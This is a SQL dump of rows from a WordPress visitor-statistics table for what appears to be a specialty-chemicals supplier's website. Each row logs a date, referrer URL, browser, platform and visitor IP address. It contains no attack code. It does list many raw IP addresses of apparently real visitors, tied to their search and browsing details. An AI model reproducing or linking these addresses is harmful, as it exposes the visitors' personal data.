INSERT INTO `wp_statistics_visitor` VALUES (11736, '2016-10-25', 'https://www.adsensecustomsearchads.com/afs/ads?q=freeze%20spray&adpage=2&ccfn=amazon_search_numbered_wide_underline&r=m&fexp=21404%2C7000108&client=amazon&channel=g-channel-19%2Bg-channel-137%2Bg-channel-330&hl=en&adtest=off&type=0&oe=UTF-8&ie=UTF-8&jsei=4&format=n4&ad=n4&nocache=191477427811376&num=0&output=uds_ads_only&v=3&bsl=10&u_his=9&u_tz=-300&dt=1477427811377&u_w=1366&u_h=768&biw=-12245933&bih=-12245933&isw=1122&ish=1&psw=1122&psh=0&frm=2&uio=uv3-&jsv=58687&rurl=httpss%3A%2F%2Fd14qd3he45186l.cloudfront.net%2Fads-search32.html&referer=www.amazon.com', 'Edge', 'Windows', '14.14393', '', '97.75.125.94', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11737, '2016-10-25', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '64.73.228.250', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11738, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '87.251.182.114', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11739, '2016-10-25', 'https://www.google.com/', 'Chrome', 'Windows', '51.0.2704.84', '', '174.78.176.42', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11740, '2016-10-25', 'https://www.google.com/', 'Firefox', 'Windows', '49.0', '', '170.133.200.240', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11741, '2016-10-25', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '68.195.28.255', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11742, '2016-10-25', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '209.23.159.98', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11743, '2016-10-25', 'https://search.yahoo.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '67.52.0.246', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11744, '2016-10-25', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '216.119.142.90', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11745, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '195.190.118.6', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11746, '2016-10-25', 'https://www.miller-stephenson.com/chemicals/release-agents/', 'Chrome', 'iPad', '54.0.2840.66', '', '192.35.35.36', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11747, '2016-10-25', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '47.154.79.124', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11748, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '188.255.40.169', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11749, '2016-10-25', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.57.75', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11750, '2016-10-25', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.49.64', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11751, '2016-10-25', 'https://www.miller-stephenson.com', 'Safari', 'Macintosh', '10.0', '', '70.24.177.128', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11752, '2016-10-25', 'https://www.google.com/aclk?sa=L&ai=DChcSEwid47z-8PbPAhXOXn4KHbf-BpwYABAA&sig=AOD64_0cfSLJ0yCGAMkoQBZMLp6tPPAWug&rct=j&q=&ved=0ahUKEwjxjbr-8PbPAhUCllQKHVXIBR4Q0QwIHA&adurl=', 'Firefox', 'Windows', '17.0', '', '10.178.211.66', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11753, '2016-10-25', 'https://www.google.com/search?ei=RswPWKeTBKSpjwSl54uwCA&q=slick+em+food+grade+lubricant&oq=slick+em+lu&gs_l=mobile-gws-serp.1.0.0i22i30k1.6000.8226.0.10340.3.3.0.0.0.0.382.836.2-2j1.3.0....0...1.1j4.64.mobile-gws-serp..0.3.832...0.f1SFIHSqaBQ', 'Chrome', 'Android', '44.0.2403.133', '', '162.197.238.219', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11754, '2016-10-25', 'https://www.miller-stephenson.com', 'Chrome', 'Macintosh', '26.0.1410.65', '', '52.70.48.63', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11755, '2016-10-25', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '53.0.2785.143', '', '50.201.122.226', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11756, '2016-10-25', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '9.0', '', '70.193.217.34', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11757, '2016-10-25', 'https://vykup-avto-krasnodar.ru/', 'MSIE', 'Windows', '5.5', '', '176.8.88.141', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11758, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '109.184.88.55', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11759, '2016-10-25', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '68.115.12.229', '000', 13, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11760, '2016-10-25', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '10.0', '', '75.133.124.181', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11761, '2016-10-25', 'https://www.google.dk/', 'Chrome', 'Android', '53.0.2785.124', '', '213.140.68.142', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11762, '2016-10-25', 'https://www.bing.com/search?q=EPIKURE%203140%20Polyamide%20Curing%20Agent&qs=n&form=QBRE&pq=epikure%203140%20polyamide%20curing%20agent&sc=0-35&sp=-1&sk=&cvid=4F10936AB9FE45B9AC21218B4F729FE0', 'MSIE', 'Windows', '11.0', '', '40.140.26.106', '000', 14, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11763, '2016-10-25', 'https://www.google.com/', 'Safari', 'iPhone', '10.0', '', '71.169.3.46', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11764, '2016-10-25', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '220.181.51.82', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11765, '2016-10-25', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '220.181.51.74', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11766, '2016-10-25', 'https://www.miller-stephenson.com', 'Konqueror', 'Windows', '9.9', '', '107.172.150.57', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11767, '2016-10-25', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '64.183.170.30', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11768, '2016-10-25', 'https://www.miller-stephenson.com', 'Safari', 'Macintosh', '10.0', '', '128.163.8.205', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11769, '2016-10-25', 'https://shinikiev.com.ua/', 'Unknown', 'Unknown', 'Unknown', '', '46.211.197.241', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11770, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.39.55.11', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11771, '2016-10-25', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.59', '', '192.169.22.238', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11772, '2016-10-25', 'https://www.miller-stephenson.com', 'Slackbot-LinkExpanding', 'Unknown', 'Unknown', '', '52.90.146.42', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11773, '2016-10-25', 'https://www.miller-stephenson.com', 'Slackbot-LinkExpanding', 'Unknown', 'Unknown', '', '54.89.92.4', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11774, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '83.234.22.7', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11775, '2016-10-25', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '54.0.2840.71', '', '192.169.22.238', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11776, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.31.164.173', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11777, '2016-10-25', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '23.30.210.217', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11778, '2016-10-25', 'https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=5&ved=0ahUKEwiQoN3rgPfPAhXog1QKHbqRC3kQFghCMAQ&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2Fxp-2a7%2F&usg=AFQjCNH_EXXUVQoKVUtvzoTf6RlJsSK3Zg', 'MSIE', 'Windows', '11.0', '', '132.190.92.85', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11779, '2016-10-25', 'https://www.google.ca/', 'Chrome', 'Windows', '53.0.2785.143', '', '99.254.177.46', '000', 7, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11780, '2016-10-25', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '6.0', '', '43.224.35.27', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11781, '2016-10-25', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '50.168.73.26', '000', 13, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11782, '2016-10-25', 'https://www.miller-stephenson.com/product/ptfe-release-agent/', 'Safari', 'iPhone', '10.0', '', '24.193.212.151', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11783, '2016-10-25', 'https://www.google.de/', 'Safari', 'iPhone', '9.0', '', '31.18.83.80', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11784, '2016-10-25', 'https://www.google.com/', 'Firefox', 'Windows', '48.0', '', '98.178.189.89', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11785, '2016-10-25', 'https://www.google.com/aclk?sa=L&ai=DChcSEwjfntKLhvfPAhWJX34KHVI1DT0YABAH&sig=AOD64_3dLQUrcuzdc7-8xdQrl7EeWXQwbw&rct=j&q=&ved=0ahUKEwjfsc6LhvfPAhVBC2MKHdKHBPYQ0QwIhQE&adurl=', 'MSIE', 'Windows', '11.0', '', '174.76.17.245', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11786, '2016-10-25', 'https://www.miller-stephenson.com', 'MSIE', 'Unknown', 'or', '', '203.133.169.134', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11787, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '80.255.136.170', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11788, '2016-10-25', 'https://www.miller-stephenson.com/', 'Chrome', 'Windows', '39.0.2171.99', '', '104.223.30.67', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11789, '2016-10-25', 'https://www.miller-stephenson.com/', 'Opera', 'Windows', '12.17', '', '104.223.30.67', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11790, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '212.33.235.132', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11791, '2016-10-25', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '107.22.27.63', '000', 169, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11792, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '31.163.232.13', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11793, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '47.0', '', '24.193.212.151', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11794, '2016-10-25', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '7.0', '', '131.253.27.89', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11795, '2016-10-25', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '10.0', '', '70.209.129.255', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11796, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '77.43.144.32', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11797, '2016-10-25', 'https://board.moparts.org/ubbthreads/ubbthreads.php/topics/1329122/2.html', 'Firefox', 'Windows', '49.0', '', '192.161.76.13', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11798, '2016-10-25', 'https://www.miller-stephenson.com', 'Safari', 'Macintosh', '10.0', '', '70.27.30.205', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11799, '2016-10-25', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.57.22', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11800, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '85.143.128.174', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11801, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '188.162.65.20', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11802, '2016-10-25', 'https://www.thebluebook.com/wsnsa.dll/WService=wsbrk1/sales/itinupdcompnew.p', 'Chrome', 'Macintosh', '54.0.2840.71', '', '96.249.213.199', '000', 20, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11803, '2016-10-25', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '170.173.0.22', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11804, '2016-10-25', 'https://www.miller-stephenson.com/chemicals/epoxy-resins/heloxyepoxy-functional-modifiers/heloxy-flexibilizers/', 'AppleWebKit', 'Windows', '534', '', '199.30.24.238', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11805, '2016-10-25', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '81.88.116.248', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11806, '2016-10-26', 'https://www.google.co.kr/url?url=https://www.miller-stephenson.com/product/plastic-glass-metal-cleaner/&rct=j&frm=1&q=&esrc=s&sa=U&ved=0ahUKEwiV-qq5lffPAhVHabwKHbeoD5QQFggZMAE&sig2=l44zX3syrWCTCRZ3x9U16Q&usg=AFQjCNEF0An01mObOdB53btcd4GuioxeIQ', 'MSIE', 'Windows', '9.0', '', '218.236.173.253', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11807, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '188.162.229.218', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11808, '2016-10-26', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '157.55.39.87', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11809, '2016-10-26', 'https://1-99seo.com/try.php?u=https://www.miller-stephenson.com', 'Chrome', 'Windows', '47.0.2526.111', '', '201.25.233.239', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11810, '2016-10-26', 'https://www.miller-stephenson.com/products/detail.aspx?itemid=57', 'MSIE', 'Windows', '9.0', '', '182.118.25.225', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11811, '2016-10-26', 'https://www.miller-stephenson.com/miller/support.html', 'Chrome', 'Windows', '54.0.2840.71', '', '192.168.10.68', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11812, '2016-10-26', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '8.0', '', '74.217.90.250', '000', 11, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11813, '2016-10-26', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '9.0', '', '74.217.90.250', '000', 10, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11814, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '32.0', '', '95.88.3.209', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11815, '2016-10-26', 'https://www.google.com/', 'Chrome', 'Windows', '53.0.2785.143', '', '216.163.53.250', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11816, '2016-10-26', 'https://www.miller-stephenson.com', 'Unknown', 'Unknown', 'Unknown', '', '139.162.228.24', '000', 24, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11817, '2016-10-26', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '10.0', '', '75.133.124.181', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11818, '2016-10-26', 'https://globalwits.globalsou.com/crawl/searchResult.asp?id=55922', 'Chrome', 'Windows', '45.0.2454.101', '', '27.223.28.58', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11819, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '176.125.164.35', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11820, '2016-10-26', 'https://www.google.com/', 'Chrome', 'iPhone', '53.0.2785.109', '', '166.137.246.93', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11821, '2016-10-26', 'https://www.miller-stephenson.com', 'Wget', 'Linux', '1.12', '', '192.69.88.122', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11822, '2016-10-26', 'https://www.google.com/aclk?sa=L&ai=DChcSEwjIlp-NovfPAhUVHYEKHScfCLMYABAF&sig=AOD64_0i8y7BIOJ35IrfCyFcIj1x21bg2w&rct=j&q=&ved=0ahUKEwiky5uNovfPAhUDQCYKHR0QD3MQ0QwIJA&adurl=', 'MSIE', 'Windows', '11.0', '', '47.187.146.2', '000', 6, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11823, '2016-10-26', 'https://www.miller-stephenson.com/troubleshooting-common-molding-issues/', 'Safari', 'iPhone', '10.0', '', '24.193.212.151', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11824, '2016-10-26', 'https://www.google.com/', 'Edge', 'Windows', '14.14393', '', '63.141.29.29', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11825, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '85.12.224.162', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11826, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '195.208.139.77', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11827, '2016-10-26', 'https://www.adsensecustomsearchads.com/afs/ads?q=teflon%20spray&adpage=1&ccfn=amazon_search_numbered_wide_underline&r=m&fexp=21404&client=amazon&channel=g-channel-5%2Bg-channel-137%2Bg-channel-330&hl=en&adtest=off&type=0&oe=UTF-8&ie=UTF-8&format=n4&ad=n4&nocache=5031477444555994&num=0&output=uds_ads_only&v=3&bsl=10&u_his=10&u_tz=-240&dt=1477444555997&u_w=1366&u_h=768&biw=-12245933&bih=-12245933&isw=1122&ish=1&psw=1122&psh=0&frm=2&uio=uv3-&jsv=58687&rurl=httpss%3A%2F%2Fd14qd3he45186l.cloudfront.net%2Fads-search32.html&referer=www.amazon.com', 'Edge', 'Windows', '14.14393', '', '47.33.197.32', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11828, '2016-10-26', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.55.155', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11829, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '128.68.86.216', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11830, '2016-10-26', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '5.01', '', '84.117.193.163', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11831, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '1.5', '', '217.174.192.132', '000', 119, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11832, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '87.251.182.114', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11833, '2016-10-26', 'https://www.miller-stephenson.com', 'MSIE', 'Windows', '11.0', '', '206.127.110.77', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11834, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '178.68.46.201', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11835, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '32.0', '', '79.217.108.106', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11836, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '82.138.49.199', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11837, '2016-10-26', 'https://www.emastercam.com/board/topic/36491-tool-stuck-in-spindle/page-2', 'Chrome', 'Windows', '54.0.2840.71', '', '122.154.101.194', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11838, '2016-10-26', 'https://www.google.com/', 'Safari', 'iPad', '9.0', '', '184.96.124.190', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11839, '2016-10-26', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '34.0.1847.137', '', '192.99.147.201', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11840, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '128.234.20.72', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11841, '2016-10-26', 'https://www.miller-stephenson.com', 'Java', 'Unknown', '1.6.0', '', '51.175.135.105', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11842, '2016-10-26', 'https://www.miller-stephenson.com', 'Safari', 'Macintosh', '3.0.4', '', '107.77.70.31', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11843, '2016-10-26', 'https://www.google.com/', 'Chrome', 'Android', '44.0.2403.133', '', '2.190.186.28', '000', 8, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11844, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '109.197.21.189', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11845, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '27.0', '', '213.223.171.232', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11846, '2016-10-26', 'https://www.google.com/', 'Chrome', 'Android', '53.0.2785.124', '', '70.208.233.213', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11847, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '40.1', '', '8.27.216.33', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11848, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '110.139.78.25', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11849, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '90.189.120.90', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11850, '2016-10-26', 'https://www.google.com/', 'Chrome', 'Windows', '54.0.2840.71', '', '74.141.71.124', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11851, '2016-10-26', 'https://www.google.com.au/', 'Chrome', 'Windows', '54.0.2840.71', '', '210.18.211.190', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11852, '2016-10-26', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.52.165', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11853, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '95.190.196.115', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11854, '2016-10-26', 'https://www.miller-stephenson.com', 'Safari', 'iPhone', '10.0', '', '32.208.185.6', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11855, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '46.108.98.196', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11856, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '92.241.100.243', '000', 4, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11857, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '195.112.242.14', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11858, '2016-10-26', 'https://www.miller-stephenson.com', 'Chrome', 'Windows', '45.0.2454.93', '', '202.46.55.133', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11859, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '212.164.214.221', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11860, '2016-10-26', 'https://www.google.co.kr/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwjH3Zy7wvfPAhUKULwKHf0SCswQFggeMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Frelease-agents%2F&usg=AFQjCNHbwMDofHjUU2PB95SWZra5M3XNKA&bvm=bv.136811127,d.dGc', 'MSIE', 'Windows', '11.0', '', '203.247.147.7', '000', 5, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11861, '2016-10-26', 'https://www.google.com/', 'Chrome', 'Android', '53.0.2785.124', '', '107.77.70.31', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11862, '2016-10-26', 'https://www.miller-stephenson.com', 'Chrome', 'Linux', '49.0.2623.75', '', '175.194.30.164', '000', 1, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11863, '2016-10-26', 'https://www.google.co.kr/url?url=https://www.miller-stephenson.com/chemicals/krytox-tribosys-finish-line/tribosys/ptfe-dryfilm-lubricants/&rct=j&frm=1&q=&esrc=s&sa=U&ved=0ahUKEwjhpZ6ew_fPAhWLyLwKHRUvDYAQFggxMAU&usg=AFQjCNHlXlm_IH06in0RTtr6TKSRrrIjgA', 'MSIE', 'Windows', '7.0', '', '175.194.30.164', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11864, '2016-10-26', 'https://www.yellowpages.com/danbury-ct/chemical-supply', 'Chrome', 'Windows', '54.0.2840.71', '', '45.37.114.44', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11865, '2016-10-26', 'https://www.miller-stephenson.com', 'Safari', 'Macintosh', '9.1.2', '', '100.8.97.194', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11866, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '79.104.200.146', '000', 3, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11867, '2016-10-26', 'https://www.miller-stephenson.com', 'Firefox', 'Windows', '34.0', '', '81.88.116.248', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11868, '2016-10-26', 'https://www.google.co.kr/url?sa=t&rct=j&q=&esrc=s&source=web&cd=6&ved=0ahUKEwi8o4GcyPfPAhVDUbwKHVuKB4YQFghDMAU&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fchemicals%2Fkrytox-tribosys-finish-line%2Ftribosys%2Fptfe-dryfilm-lubricants%2F&usg=AFQjCNGbkrsEd1oupMqq-nMxkLQTYxMOmw&bvm=bv.136811127,d.dGc', 'MSIE', 'Windows', '11.0', '', '175.194.30.164', '000', 2, 0); 
INSERT INTO `wp_statistics_visitor` VALUES (11869, '2016-10-26', 'https://www.google.co.jp/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&ved=0ahUKEwiKzp3pyffPAhVHW5QKHUQkCRgQFggcMAA&url=https%3A%2F%2F104.238.94.202%2F%7Enotactiveddd%2Fms4%2Fproduct%2F157-fsl%2F&usg=AFQjCNGbgfl9cHc-ETJizWt_DmpR6ieaUA&bvm=bv.136593572,d.dGo', 'MSIE', 'Windows', '11.0', '', '10.85.5.94', '000', 2, 0); 
